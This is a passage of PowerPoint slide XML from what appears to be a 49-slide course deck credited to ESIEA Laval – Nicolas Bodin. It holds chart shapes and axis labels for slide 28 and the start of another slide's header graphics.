            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="object 538"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264887" y="3210275"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545">
                <a:moveTo>
                  <a:pt x="42035" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="object 539"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264887" y="2654941"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545">
                <a:moveTo>
                  <a:pt x="42035" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="object 540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264887" y="2099609"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545">
                <a:moveTo>
                  <a:pt x="42035" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="object 541"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2142332" y="1544276"/>
            <a:ext cx="5117704" cy="4443229"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2582545" h="2242185">
                <a:moveTo>
                  <a:pt x="0" y="2241901"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2582190" y="2241901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582190" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2241901"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="object 542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188332" y="1544276"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="42035"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="object 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7080832" y="1544276"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="42035"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="object 544"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2113335" y="6009461"/>
            <a:ext cx="117026" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="object 558"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="object 559"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>28 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="object 545"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3074319" y="6009462"/>
            <a:ext cx="183719" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="object 546"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4036108" y="6009462"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="object 547"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5030152" y="6009462"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>150</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="object 548"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024994" y="6009462"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="object 549"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7019042" y="6009462"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>250</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="object 550"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1901908" y="5910293"/>
            <a:ext cx="117026" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="object 551"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769685" y="5354960"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="object 552"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769685" y="4799628"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="object 553"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769685" y="4244294"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>300</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="object 554"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769685" y="3688960"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>400</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="object 555"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769685" y="3133628"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>500</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="object 556"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769685" y="2578294"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>600</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="object 557"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769685" y="2022960"/>
            <a:ext cx="249153" cy="152478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="991" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>700</a:t>
            </a:r>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Rectangle 559"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="499213892"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" algn="ctr"/>
            <a:r>
